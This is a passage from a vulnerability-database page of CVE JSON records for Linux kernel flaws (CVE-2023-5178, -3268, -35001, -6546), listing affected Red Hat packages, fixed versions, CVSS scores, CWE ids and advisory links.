"collectionURL": "https://access.redhat.com/downloads/content/package-browser/",
"cpes": [
"cpe:/o:redhat:rhel_e4s:8.2::baseos",
"cpe:/o:redhat:rhel_tus:8.2::baseos",
"cpe:/o:redhat:rhel_aus:8.2::baseos"
],
"defaultStatus": "affected",
"packageName": "kernel",
"product": "Red Hat Enterprise Linux 8.2 Advanced Update Support",
"vendor": "Red Hat",
"versions": [
{
"lessThan": "*",
"status": "unaffected",
"version": "0:4.18.0-193.128.1.el8_2",
"versionType": "rpm"
}
]
},
{
"collectionURL": "https://access.redhat.com/downloads/content/package-browser/",
"cpes": [
"cpe:/a:redhat:rhel_tus:8.2::nfv",
"cpe:/a:redhat:rhel_tus:8.2::realtime"
],
"defaultStatus": "affected",
"packageName": "kernel-rt",
"product": "Red Hat Enterprise Linux 8.2 Telecommunications Update Service",
"vendor": "Red Hat",
"versions": [
{
"lessThan": "*",
"status": "unaffected",
"version": "0:4.18.0-193.128.1.rt13.179.el8_2",
"versionType": "rpm"
}
]
},
{
"collectionURL": "https://access.redhat.com/downloads/content/package-browser/",
"cpes": [
"cpe:/o:redhat:rhel_e4s:8.2::baseos",
"cpe:/o:redhat:rhel_tus:8.2::baseos",
"cpe:/o:redhat:rhel_aus:8.2::baseos"
],
"defaultStatus": "affected",
"packageName": "kernel",
"product": "Red Hat Enterprise Linux 8.2 Telecommunications Update Service",
"vendor": "Red Hat",
"versions": [
{
"lessThan": "*",
"status": "unaffected",
"version": "0:4.18.0-193.128.1.el8_2",
"versionType": "rpm"
}
]
},
{
"collectionURL": "https://access.redhat.com/downloads/content/package-browser/",
"cpes": [
"cpe:/o:redhat:rhel_e4s:8.2::baseos",
"cpe:/o:redhat:rhel_tus:8.2::baseos",
"cpe:/o:redhat:rhel_aus:8.2::baseos"
],
"defaultStatus": "affected",
"packageName": "kernel",
"product": "Red Hat Enterprise Linux 8.2 Update Services for SAP Solutions",
"vendor": "Red Hat",
"versions": [
{
"lessThan": "*",
"status": "unaffected",
"version": "0:4.18.0-193.128.1.el8_2",
"versionType": "rpm"
}
]
},
{
"collectionURL": "https://access.redhat.com/downloads/content/package-browser/",
"cpes": [
"cpe:/o:redhat:rhel_e4s:8.2::baseos"
],
"defaultStatus": "unaffected",
"packageName": "kpatch-patch",
"product": "Red Hat Enterprise Linux 8.2 Update Services for SAP Solutions",
"vendor": "Red Hat"
},
{
"collectionURL": "https://access.redhat.com/downloads/content/package-browser/",
"cpes": [
"cpe:/o:redhat:rhel_e4s:8.4::baseos",
"cpe:/o:redhat:rhel_aus:8.4::baseos",
"cpe:/o:redhat:rhel_tus:8.4::baseos"
],
"defaultStatus": "affected",
"packageName": "kernel",
"product": "Red Hat Enterprise Linux 8.4 Advanced Mission Critical Update Support",
"vendor": "Red Hat",
"versions": [
{
"lessThan": "*",
"status": "unaffected",
"version": "0:4.18.0-305.114.1.el8_4",
"versionType": "rpm"
}
]
},
{
"collectionURL": "https://access.redhat.com/downloads/content/package-browser/",
"cpes": [
"cpe:/a:redhat:rhel_tus:8.4::realtime",
"cpe:/a:redhat:rhel_tus:8.4::nfv"
],
"defaultStatus": "affected",
"packageName": "kernel-rt",
"product": "Red Hat Enterprise Linux 8.4 Telecommunications Update Service",
"vendor": "Red Hat",
"versions": [
{
"lessThan": "*",
"status": "unaffected",
"version": "0:4.18.0-305.114.1.rt7.190.el8_4",
"versionType": "rpm"
}
]
},
{
"collectionURL": "https://access.redhat.com/downloads/content/package-browser/",
"cpes": [
"cpe:/o:redhat:rhel_e4s:8.4::baseos",
"cpe:/o:redhat:rhel_aus:8.4::baseos",
"cpe:/o:redhat:rhel_tus:8.4::baseos"
],
"defaultStatus": "affected",
"packageName": "kernel",
"product": "Red Hat Enterprise Linux 8.4 Telecommunications Update Service",
"vendor": "Red Hat",
"versions": [
{
"lessThan": "*",
"status": "unaffected",
"version": "0:4.18.0-305.114.1.el8_4",
"versionType": "rpm"
}
]
},
{
"collectionURL": "https://access.redhat.com/downloads/content/package-browser/",
"cpes": [
"cpe:/o:redhat:rhel_e4s:8.4::baseos",
"cpe:/o:redhat:rhel_aus:8.4::baseos",
"cpe:/o:redhat:rhel_tus:8.4::baseos"
],
"defaultStatus": "affected",
"packageName": "kernel",
"product": "Red Hat Enterprise Linux 8.4 Update Services for SAP Solutions",
"vendor": "Red Hat",
"versions": [
{
"lessThan": "*",
"status": "unaffected",
"version": "0:4.18.0-305.114.1.el8_4",
"versionType": "rpm"
}
]
},
{
"collectionURL": "https://access.redhat.com/downloads/content/package-browser/",
"cpes": [
"cpe:/o:redhat:rhel_e4s:8.4::baseos"
],
"defaultStatus": "unaffected",
"packageName": "kpatch-patch",
"product": "Red Hat Enterprise Linux 8.4 Update Services for SAP Solutions",
"vendor": "Red Hat"
},
{
"collectionURL": "https://access.redhat.com/downloads/content/package-browser/",
"cpes": [
"cpe:/o:redhat:rhel_eus:8.6::baseos"
],
"defaultStatus": "unaffected",
"packageName": "kpatch-patch",
"product": "Red Hat Enterprise Linux 8.6 Extended Update Support",
"vendor": "Red Hat"
},
{
"collectionURL": "https://access.redhat.com/downloads/content/package-browser/",
"cpes": [
"cpe:/o:redhat:rhel_eus:8.6::baseos",
"cpe:/a:redhat:rhel_eus:8.6::crb",
"cpe:/o:redhat:rhev_hypervisor:4.4::el8"
],
"defaultStatus": "affected",
"packageName": "kernel",
"product": "Red Hat Enterprise Linux 8.6 Extended Update Support",
"vendor": "Red Hat",
"versions": [
{
"lessThan": "*",
"status": "unaffected",
"version": "0:4.18.0-372.87.1.el8_6",
"versionType": "rpm"
}
]
},
{
"collectionURL": "https://access.redhat.com/downloads/content/package-browser/",
"cpes": [
"cpe:/o:redhat:rhel_eus:8.8::baseos"
],
"defaultStatus": "unaffected",
"packageName": "kpatch-patch",
"product": "Red Hat Enterprise Linux 8.8 Extended Update Support",
"vendor": "Red Hat"
},
{
"collectionURL": "https://access.redhat.com/downloads/content/package-browser/",
"cpes": [
"cpe:/a:redhat:rhel_eus:8.8::crb",
"cpe:/o:redhat:rhel_eus:8.8::baseos"
],
"defaultStatus": "affected",
"packageName": "kernel",
"product": "Red Hat Enterprise Linux 8.8 Extended Update Support",
"vendor": "Red Hat",
"versions": [
{
"lessThan": "*",
"status": "unaffected",
"version": "0:4.18.0-477.43.1.el8_8",
"versionType": "rpm"
}
]
},
{
"collectionURL": "https://access.redhat.com/downloads/content/package-browser/",
"cpes": [
"cpe:/a:redhat:enterprise_linux:9::crb",
"cpe:/a:redhat:enterprise_linux:9::realtime",
"cpe:/a:redhat:enterprise_linux:9::appstream",
"cpe:/a:redhat:enterprise_linux:9::nfv",
"cpe:/o:redhat:enterprise_linux:9::baseos"
],
"defaultStatus": "affected",
"packageName": "kernel",
"product": "Red Hat Enterprise Linux 9",
"vendor": "Red Hat",
"versions": [
{
"lessThan": "*",
"status": "unaffected",
"version": "0:5.14.0-362.18.1.el9_3",
"versionType": "rpm"
}
]
},
{
"collectionURL": "https://access.redhat.com/downloads/content/package-browser/",
"cpes": [
"cpe:/o:redhat:enterprise_linux:9::baseos"
],
"defaultStatus": "unaffected",
"packageName": "kpatch-patch",
"product": "Red Hat Enterprise Linux 9",
"vendor": "Red Hat"
},
{
"collectionURL": "https://access.redhat.com/downloads/content/package-browser/",
"cpes": [
"cpe:/a:redhat:enterprise_linux:9::crb",
"cpe:/a:redhat:enterprise_linux:9::realtime",
"cpe:/a:redhat:enterprise_linux:9::appstream",
"cpe:/a:redhat:enterprise_linux:9::nfv",
"cpe:/o:redhat:enterprise_linux:9::baseos"
],
"defaultStatus": "affected",
"packageName": "kernel",
"product": "Red Hat Enterprise Linux 9",
"vendor": "Red Hat",
"versions": [
{
"lessThan": "*",
"status": "unaffected",
"version": "0:5.14.0-362.18.1.el9_3",
"versionType": "rpm"
}
]
},
{
"collectionURL": "https://access.redhat.com/downloads/content/package-browser/",
"cpes": [
"cpe:/a:redhat:rhel_eus:9.0::crb",
"cpe:/a:redhat:rhel_eus:9.0::appstream",
"cpe:/o:redhat:rhel_eus:9.0::baseos"
],
"defaultStatus": "affected",
"packageName": "kernel",
"product": "Red Hat Enterprise Linux 9.0 Extended Update Support",
"vendor": "Red Hat",
"versions": [
{
"lessThan": "*",
"status": "unaffected",
"version": "0:5.14.0-70.85.1.el9_0",
"versionType": "rpm"
}
]
},
{
"collectionURL": "https://access.redhat.com/downloads/content/package-browser/",
"cpes": [
"cpe:/a:redhat:rhel_eus:9.0::realtime",
"cpe:/a:redhat:rhel_eus:9.0::nfv"
],
"defaultStatus": "affected",
"packageName": "kernel-rt",
"product": "Red Hat Enterprise Linux 9.0 Extended Update Support",
"vendor": "Red Hat",
"versions": [
{
"lessThan": "*",
"status": "unaffected",
"version": "0:5.14.0-70.85.1.rt21.156.el9_0",
"versionType": "rpm"
}
]
},
{
"collectionURL": "https://access.redhat.com/downloads/content/package-browser/",
"cpes": [
"cpe:/o:redhat:rhel_eus:9.0::baseos"
],
"defaultStatus": "unaffected",
"packageName": "kpatch-patch",
"product": "Red Hat Enterprise Linux 9.0 Extended Update Support",
"vendor": "Red Hat"
},
{
"collectionURL": "https://access.redhat.com/downloads/content/package-browser/",
"cpes": [
"cpe:/a:redhat:rhel_eus:9.2::crb",
"cpe:/a:redhat:rhel_eus:9.2::appstream",
"cpe:/o:redhat:rhel_eus:9.2::baseos"
],
"defaultStatus": "affected",
"packageName": "kernel",
"product": "Red Hat Enterprise Linux 9.2 Extended Update Support",
"vendor": "Red Hat",
"versions": [
{
"lessThan": "*",
"status": "unaffected",
"version": "0:5.14.0-284.40.1.el9_2",
"versionType": "rpm"
}
]
},
{
"collectionURL": "https://access.redhat.com/downloads/content/package-browser/",
"cpes": [
"cpe:/a:redhat:rhel_eus:9.2::nfv",
"cpe:/a:redhat:rhel_eus:9.2::realtime"
],
"defaultStatus": "affected",
"packageName": "kernel-rt",
"product": "Red Hat Enterprise Linux 9.2 Extended Update Support",
"vendor": "Red Hat",
"versions": [
{
"lessThan": "*",
"status": "unaffected",
"version": "0:5.14.0-284.40.1.rt14.325.el9_2",
"versionType": "rpm"
}
]
},
{
"collectionURL": "https://access.redhat.com/downloads/content/package-browser/",
"cpes": [
"cpe:/o:redhat:rhel_eus:9.2::baseos"
],
"defaultStatus": "unaffected",
"packageName": "kpatch-patch",
"product": "Red Hat Enterprise Linux 9.2 Extended Update Support",
"vendor": "Red Hat"
},
{
"collectionURL": "https://access.redhat.com/downloads/content/package-browser/",
"cpes": [
"cpe:/o:redhat:rhel_eus:8.6::baseos",
"cpe:/a:redhat:rhel_eus:8.6::crb",
"cpe:/o:redhat:rhev_hypervisor:4.4::el8"
],
"defaultStatus": "affected",
"packageName": "kernel",
"product": "Red Hat Virtualization 4 for Red Hat Enterprise Linux 8",
"vendor": "Red Hat",
"versions": [
{
"lessThan": "*",
"status": "unaffected",
"version": "0:4.18.0-372.87.1.el8_6",
"versionType": "rpm"
}
]
},
{
"collectionURL": "https://access.redhat.com/downloads/content/package-browser/",
"cpes": [
"cpe:/o:redhat:enterprise_linux:6"
],
"defaultStatus": "unaffected",
"packageName": "kernel",
"product": "Red Hat Enterprise Linux 6",
"vendor": "Red Hat"
},
{
"collectionURL": "https://access.redhat.com/downloads/content/package-browser/",
"cpes": [
"cpe:/o:redhat:enterprise_linux:7"
],
"defaultStatus": "unaffected",
"packageName": "kernel",
"product": "Red Hat Enterprise Linux 7",
"vendor": "Red Hat"
},
{
"collectionURL": "https://access.redhat.com/downloads/content/package-browser/",
"cpes": [
"cpe:/o:redhat:enterprise_linux:7"
],
"defaultStatus": "unaffected",
"packageName": "kernel-rt",
"product": "Red Hat Enterprise Linux 7",
"vendor": "Red Hat"
},
{
"collectionURL": "https://access.redhat.com/downloads/content/package-browser/",
"cpes": [
"cpe:/o:redhat:enterprise_linux:9"
],
"defaultStatus": "affected",
"packageName": "kernel-rt",
"product": "Red Hat Enterprise Linux 9",
"vendor": "Red Hat"
}
],
"datePublic": "2023-10-15T00:00:00.000Z",
"descriptions": [
{
"lang": "en",
"value": "A use-after-free vulnerability was found in drivers/nvme/target/tcp.c` in `nvmet_tcp_free_crypto` due to a logical bug in the NVMe/TCP subsystem in the Linux kernel. This issue may allow a malicious user to cause a use-after-free and double-free problem, which may permit remote code execution or lead to local privilege escalation."
}
],
"metrics": [
{
"other": {
"content": {
"namespace": "https://access.redhat.com/security/updates/classification/",
"value": "Important"
},
"type": "Red Hat severity rating"
}
},
{
"cvssV3_1": {
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"availabilityImpact": "HIGH",
"baseScore": 8.8,
"baseSeverity": "HIGH",
"confidentialityImpact": "HIGH",
"integrityImpact": "HIGH",
"privilegesRequired": "LOW",
"scope": "UNCHANGED",
"userInteraction": "NONE",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H",
"version": "3.1"
},
"format": "CVSS"
}
],
"problemTypes": [
{
"descriptions": [
{
"cweId": "CWE-416",
"description": "Use After Free",
"lang": "en",
"type": "CWE"
}
]
}
],
"providerMetadata": {
"dateUpdated": "2025-09-26T02:52:27.026Z",
"orgId": "53f830b8-0a3f-465b-8143-3b8a9948e749",
"shortName": "redhat"
},
"references": [
{
"name": "RHSA-2023:7370",
"tags": [
"vendor-advisory",
"x_refsource_REDHAT"
],
"url": "https://access.redhat.com/errata/RHSA-2023:7370"
},
{
"name": "RHSA-2023:7379",
"tags": [
"vendor-advisory",
"x_refsource_REDHAT"
],
"url": "https://access.redhat.com/errata/RHSA-2023:7379"
},
{
"name": "RHSA-2023:7418",
"tags": [
"vendor-advisory",
"x_refsource_REDHAT"
],
"url": "https://access.redhat.com/errata/RHSA-2023:7418"
},
{
"name": "RHSA-2023:7548",
"tags": [
"vendor-advisory",
"x_refsource_REDHAT"
],
"url": "https://access.redhat.com/errata/RHSA-2023:7548"
},
{
"name": "RHSA-2023:7549",
"tags": [
"vendor-advisory",
"x_refsource_REDHAT"
],
"url": "https://access.redhat.com/errata/RHSA-2023:7549"
},
{
"name": "RHSA-2023:7551",
"tags": [
"vendor-advisory",
"x_refsource_REDHAT"
],
"url": "https://access.redhat.com/errata/RHSA-2023:7551"
},
{
"name": "RHSA-2023:7554",
"tags": [
"vendor-advisory",
"x_refsource_REDHAT"
],
"url": "https://access.redhat.com/errata/RHSA-2023:7554"
},
{
"name": "RHSA-2023:7557",
"tags": [
"vendor-advisory",
"x_refsource_REDHAT"
],
"url": "https://access.redhat.com/errata/RHSA-2023:7557"
},
{
"name": "RHSA-2023:7559",
"tags": [
"vendor-advisory",
"x_refsource_REDHAT"
],
"url": "https://access.redhat.com/errata/RHSA-2023:7559"
},
{
"name": "RHSA-2024:0340",
"tags": [
"vendor-advisory",
"x_refsource_REDHAT"
],
"url": "https://access.redhat.com/errata/RHSA-2024:0340"
},
{
"name": "RHSA-2024:0378",
"tags": [
"vendor-advisory",
"x_refsource_REDHAT"
],
"url": "https://access.redhat.com/errata/RHSA-2024:0378"
},
{
"name": "RHSA-2024:0386",
"tags": [
"vendor-advisory",
"x_refsource_REDHAT"
],
"url": "https://access.redhat.com/errata/RHSA-2024:0386"
},
{
"name": "RHSA-2024:0412",
"tags": [
"vendor-advisory",
"x_refsource_REDHAT"
],
"url": "https://access.redhat.com/errata/RHSA-2024:0412"
},
{
"name": "RHSA-2024:0431",
"tags": [
"vendor-advisory",
"x_refsource_REDHAT"
],
"url": "https://access.redhat.com/errata/RHSA-2024:0431"
},
{
"name": "RHSA-2024:0432",
"tags": [
"vendor-advisory",
"x_refsource_REDHAT"
],
"url": "https://access.redhat.com/errata/RHSA-2024:0432"
},
{
"name": "RHSA-2024:0461",
"tags": [
"vendor-advisory",
"x_refsource_REDHAT"
],
"url": "https://access.redhat.com/errata/RHSA-2024:0461"
},
{
"name": "RHSA-2024:0554",
"tags": [
"vendor-advisory",
"x_refsource_REDHAT"
],
"url": "https://access.redhat.com/errata/RHSA-2024:0554"
},
{
"name": "RHSA-2024:0575",
"tags": [
"vendor-advisory",
"x_refsource_REDHAT"
],
"url": "https://access.redhat.com/errata/RHSA-2024:0575"
},
{
"name": "RHSA-2024:1268",
"tags": [
"vendor-advisory",
"x_refsource_REDHAT"
],
"url": "https://access.redhat.com/errata/RHSA-2024:1268"
},
{
"name": "RHSA-2024:1269",
"tags": [
"vendor-advisory",
"x_refsource_REDHAT"
],
"url": "https://access.redhat.com/errata/RHSA-2024:1269"
},
{
"name": "RHSA-2024:1278",
"tags": [
"vendor-advisory",
"x_refsource_REDHAT"
],
"url": "https://access.redhat.com/errata/RHSA-2024:1278"
},
{
"tags": [
"vdb-entry",
"x_refsource_REDHAT"
],
"url": "https://access.redhat.com/security/cve/CVE-2023-5178"
},
{
"name": "RHBZ#2241924",
"tags": [
"issue-tracking",
"x_refsource_REDHAT"
],
"url": "https://bugzilla.redhat.com/show_bug.cgi?id=2241924"
},
{
"url": "https://lore.kernel.org/linux-nvme/20231002105428.226515-1-sagi@grimberg.me/"
}
],
"timeline": [
{
"lang": "en",
"time": "2023-10-03T00:00:00+00:00",
"value": "Reported to Red Hat."
},
{
"lang": "en",
"time": "2023-10-15T00:00:00+00:00",
"value": "Made public."
}
],
"title": "Kernel: use after free in nvmet_tcp_free_crypto in nvme",
"workarounds": [
{
"lang": "en",
"value": "Mitigation for this issue is either not available or the currently available options don\u0027t meet the Red Hat Product Security criteria comprising ease of use and deployment, applicability to widespread installation base or stability."
}
],
"x_redhatCweChain": "CWE-415-\u003eCWE-416: Double Free leads to Use After Free"
}
},
"cveMetadata": {
"assignerOrgId": "53f830b8-0a3f-465b-8143-3b8a9948e749",
"assignerShortName": "redhat",
"cveId": "CVE-2023-5178",
"datePublished": "2023-11-01T16:32:20.350Z",
"dateReserved": "2023-09-25T16:38:10.637Z",
"dateUpdated": "2025-09-26T02:52:27.026Z",
"state": "PUBLISHED"
},
"dataType": "CVE_RECORD",
"dataVersion": "5.1"
}
CVE-2023-3268 (GCVE-0-2023-3268)
Vulnerability from cvelistv5
Published
2023-06-16 00:00
Modified
2025-03-11 14:53
Severity ?
VLAI Severity ?
EPSS score ?
CWE
Summary
An out of bounds (OOB) memory access flaw was found in the Linux kernel in relay_file_read_start_pos in kernel/relay.c in the relayfs. This flaw could allow a local attacker to crash the system or leak kernel internal information.
References
| URL | Tags | |||||||||||||||||||||||||
|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|
|
||||||||||||||||||||||||||
{
"containers": {
"adp": [
{
"providerMetadata": {
"dateUpdated": "2024-08-02T06:48:08.508Z",
"orgId": "af854a3a-2127-422b-91ae-364da2661108",
"shortName": "CVE"
},
"references": [
{
"tags": [
"x_transferred"
],
"url": "https://lore.kernel.org/lkml/1682238502-1892-1-git-send-email-yangpc%40wangsu.com/T/"
},
{
"tags": [
"x_transferred"
],
"url": "https://cdn.kernel.org/pub/linux/kernel/v6.x/ChangeLog-6.3.2"
},
{
"name": "DSA-5448",
"tags": [
"vendor-advisory",
"x_transferred"
],
"url": "https://www.debian.org/security/2023/dsa-5448"
},
{
"name": "[debian-lts-announce] 20230727 [SECURITY] [DLA 3508-1] linux security update",
"tags": [
"mailing-list",
"x_transferred"
],
"url": "https://lists.debian.org/debian-lts-announce/2023/07/msg00030.html"
},
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/pub/scm/linux/kernel/git/torvalds/linux.git/commit/?id=43ec16f1450f4936025a9bdf1a273affdb9732c1"
},
{
"name": "DSA-5480",
"tags": [
"vendor-advisory",
"x_transferred"
],
"url": "https://www.debian.org/security/2023/dsa-5480"
},
{
"tags": [
"x_transferred"
],
"url": "https://security.netapp.com/advisory/ntap-20230824-0006/"
},
{
"name": "[debian-lts-announce] 20231019 [SECURITY] [DLA 3623-1] linux-5.10 security update",
"tags": [
"mailing-list",
"x_transferred"
],
"url": "https://lists.debian.org/debian-lts-announce/2023/10/msg00027.html"
}
],
"title": "CVE Program Container"
},
{
"metrics": [
{
"cvssV3_1": {
"attackComplexity": "LOW",
"attackVector": "LOCAL",
"availabilityImpact": "HIGH",
"baseScore": 7.1,
"baseSeverity": "HIGH",
"confidentialityImpact": "HIGH",
"integrityImpact": "NONE",
"privilegesRequired": "LOW",
"scope": "UNCHANGED",
"userInteraction": "NONE",
"vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:H",
"version": "3.1"
}
},
{
"other": {
"content": {
"id": "CVE-2023-3268",
"options": [
{
"Exploitation": "none"
},
{
"Automatable": "no"
},
{
"Technical Impact": "partial"
}
],
"role": "CISA Coordinator",
"timestamp": "2025-03-06T15:55:22.009931Z",
"version": "2.0.3"
},
"type": "ssvc"
}
}
],
"providerMetadata": {
"dateUpdated": "2025-03-11T14:53:35.403Z",
"orgId": "134c704f-9b21-4f2e-91b3-4a467353bcc0",
"shortName": "CISA-ADP"
},
"title": "CISA ADP Vulnrichment"
}
],
"cna": {
"affected": [
{
"product": "Kernel",
"vendor": "n/a",
"versions": [
{
"status": "affected",
"version": "Kernel version prior to 6.4-rc1"
}
]
}
],
"descriptions": [
{
"lang": "en",
"value": "An out of bounds (OOB) memory access flaw was found in the Linux kernel in relay_file_read_start_pos in kernel/relay.c in the relayfs. This flaw could allow a local attacker to crash the system or leak kernel internal information."
}
],
"problemTypes": [
{
"descriptions": [
{
"cweId": "CWE-125",
"description": "CWE-125",
"lang": "en",
"type": "CWE"
}
]
}
],
"providerMetadata": {
"dateUpdated": "2023-10-19T23:07:17.871Z",
"orgId": "53f830b8-0a3f-465b-8143-3b8a9948e749",
"shortName": "redhat"
},
"references": [
{
"url": "https://lore.kernel.org/lkml/1682238502-1892-1-git-send-email-yangpc%40wangsu.com/T/"
},
{
"url": "https://cdn.kernel.org/pub/linux/kernel/v6.x/ChangeLog-6.3.2"
},
{
"name": "DSA-5448",
"tags": [
"vendor-advisory"
],
"url": "https://www.debian.org/security/2023/dsa-5448"
},
{
"name": "[debian-lts-announce] 20230727 [SECURITY] [DLA 3508-1] linux security update",
"tags": [
"mailing-list"
],
"url": "https://lists.debian.org/debian-lts-announce/2023/07/msg00030.html"
},
{
"url": "https://git.kernel.org/pub/scm/linux/kernel/git/torvalds/linux.git/commit/?id=43ec16f1450f4936025a9bdf1a273affdb9732c1"
},
{
"name": "DSA-5480",
"tags": [
"vendor-advisory"
],
"url": "https://www.debian.org/security/2023/dsa-5480"
},
{
"url": "https://security.netapp.com/advisory/ntap-20230824-0006/"
},
{
"name": "[debian-lts-announce] 20231019 [SECURITY] [DLA 3623-1] linux-5.10 security update",
"tags": [
"mailing-list"
],
"url": "https://lists.debian.org/debian-lts-announce/2023/10/msg00027.html"
}
]
}
},
"cveMetadata": {
"assignerOrgId": "53f830b8-0a3f-465b-8143-3b8a9948e749",
"assignerShortName": "redhat",
"cveId": "CVE-2023-3268",
"datePublished": "2023-06-16T00:00:00.000Z",
"dateReserved": "2023-06-15T00:00:00.000Z",
"dateUpdated": "2025-03-11T14:53:35.403Z",
"state": "PUBLISHED"
},
"dataType": "CVE_RECORD",
"dataVersion": "5.1"
}
CVE-2023-35001 (GCVE-0-2023-35001)
Vulnerability from cvelistv5
Published
2023-07-05 18:35
Modified
2025-02-13 16:55
Severity ?
VLAI Severity ?
EPSS score ?
CWE
Summary
Linux Kernel nftables Out-Of-Bounds Read/Write Vulnerability; nft_byteorder poorly handled vm register contents when CAP_NET_ADMIN is in any user or network namespace
References
| URL | Tags | ||||||||||||||||||||||||||||||||||
|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|
|
|||||||||||||||||||||||||||||||||||
Impacted products
| Vendor | Product | Version | ||
|---|---|---|---|---|
| Linux | Linux Kernel |
Version: v3.13-rc1 |
{
"containers": {
"adp": [
{
"providerMetadata": {
"dateUpdated": "2024-08-02T16:17:04.253Z",
"orgId": "af854a3a-2127-422b-91ae-364da2661108",
"shortName": "CVE"
},
"references": [
{
"tags": [
"issue-tracking",
"x_transferred"
],
"url": "https://lore.kernel.org/netfilter-devel/20230705121515.747251-1-cascardo@canonical.com/T/"
},
{
"tags": [
"mailing-list",
"x_transferred"
],
"url": "https://www.openwall.com/lists/oss-security/2023/07/05/3"
},
{
"tags": [
"x_transferred"
],
"url": "http://www.openwall.com/lists/oss-security/2023/07/05/3"
},
{
"tags": [
"x_transferred"
],
"url": "https://www.debian.org/security/2023/dsa-5453"
},
{
"tags": [
"x_transferred"
],
"url": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/UPHI46ROSSLVAV4R5LJWJYU747JGOS6D/"
},
{
"tags": [
"x_transferred"
],
"url": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/RGZC5XOANA75OJ4XARBBXYSLDKUIJI5E/"
},
{
"tags": [
"x_transferred"
],
"url": "http://packetstormsecurity.com/files/173757/Kernel-Live-Patch-Security-Notice-LSN-0096-1.html"
},
{
"tags": [
"x_transferred"
],
"url": "https://lists.debian.org/debian-lts-announce/2023/08/msg00001.html"
},
{
"tags": [
"x_transferred"
],
"url": "https://security.netapp.com/advisory/ntap-20230824-0007/"
},
{
"tags": [
"x_transferred"
],
"url": "http://packetstormsecurity.com/files/174577/Kernel-Live-Patch-Security-Notice-LSN-0097-1.html"
},
{
"tags": [
"x_transferred"
],
"url": "https://lists.debian.org/debian-lts-announce/2024/01/msg00004.html"
}
],
"title": "CVE Program Container"
}
],
"cna": {
"affected": [
{
"platforms": [
"Linux"
],
"product": "Linux Kernel",
"vendor": "Linux",
"versions": [
{
"status": "affected",
"version": "v3.13-rc1"
}
]
}
],
"credits": [
{
"lang": "en",
"type": "finder",
"value": "Tanguy Dubroca"
}
],
"datePublic": "2023-07-05T12:15:00.000Z",
"descriptions": [
{
"lang": "en",
"value": "Linux Kernel nftables Out-Of-Bounds Read/Write Vulnerability; nft_byteorder poorly handled vm register contents when CAP_NET_ADMIN is in any user or network namespace"
}
],
"metrics": [
{
"cvssV3_1": {
"attackComplexity": "LOW",
"attackVector": "LOCAL",
"availabilityImpact": "HIGH",
"baseScore": 7.8,
"baseSeverity": "HIGH",
"confidentialityImpact": "HIGH",
"integrityImpact": "HIGH",
"privilegesRequired": "LOW",
"scope": "UNCHANGED",
"userInteraction": "NONE",
"vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H",
"version": "3.1"
},
"format": "CVSS"
}
],
"problemTypes": [
{
"descriptions": [
{
"cweId": "CWE-787",
"description": "CWE-787",
"lang": "en",
"type": "CWE"
}
]
}
],
"providerMetadata": {
"dateUpdated": "2024-01-11T19:07:23.291Z",
"orgId": "cc1ad9ee-3454-478d-9317-d3e869d708bc",
"shortName": "canonical"
},
"references": [
{
"tags": [
"issue-tracking"
],
"url": "https://lore.kernel.org/netfilter-devel/20230705121515.747251-1-cascardo@canonical.com/T/"
},
{
"tags": [
"mailing-list"
],
"url": "https://www.openwall.com/lists/oss-security/2023/07/05/3"
},
{
"url": "http://www.openwall.com/lists/oss-security/2023/07/05/3"
},
{
"url": "https://www.debian.org/security/2023/dsa-5453"
},
{
"url": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/UPHI46ROSSLVAV4R5LJWJYU747JGOS6D/"
},
{
"url": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/RGZC5XOANA75OJ4XARBBXYSLDKUIJI5E/"
},
{
"url": "http://packetstormsecurity.com/files/173757/Kernel-Live-Patch-Security-Notice-LSN-0096-1.html"
},
{
"url": "https://lists.debian.org/debian-lts-announce/2023/08/msg00001.html"
},
{
"url": "https://security.netapp.com/advisory/ntap-20230824-0007/"
},
{
"url": "http://packetstormsecurity.com/files/174577/Kernel-Live-Patch-Security-Notice-LSN-0097-1.html"
},
{
"url": "https://lists.debian.org/debian-lts-announce/2024/01/msg00004.html"
}
],
"title": "Linux Kernel nftables Out-Of-Bounds Read/Write Vulnerability"
}
},
"cveMetadata": {
"assignerOrgId": "cc1ad9ee-3454-478d-9317-d3e869d708bc",
"assignerShortName": "canonical",
"cveId": "CVE-2023-35001",
"datePublished": "2023-07-05T18:35:17.785Z",
"dateReserved": "2023-06-29T21:43:35.036Z",
"dateUpdated": "2025-02-13T16:55:43.429Z",
"state": "PUBLISHED"
},
"dataType": "CVE_RECORD",
"dataVersion": "5.1"
}
CVE-2023-6546 (GCVE-0-2023-6546)
Vulnerability from cvelistv5
Published
2023-12-21 20:01
Modified
2025-09-25 13:21
Severity ?
VLAI Severity ?
EPSS score ?
CWE
- CWE-416 - Use After Free
Summary
A race condition was found in the GSM 0710 tty multiplexor in the Linux kernel. This issue occurs when two threads execute the GSMIOC_SETCONF ioctl on the same tty file descriptor with the gsm line discipline enabled, and can lead to a use-after-free problem on a struct gsm_dlci while restarting the gsm mux. This could allow a local unprivileged user to escalate their privileges on the system.
References
| URL | Tags | ||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||
|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|
|
|||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||
Impacted products
| Vendor | Product | Version | |||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||
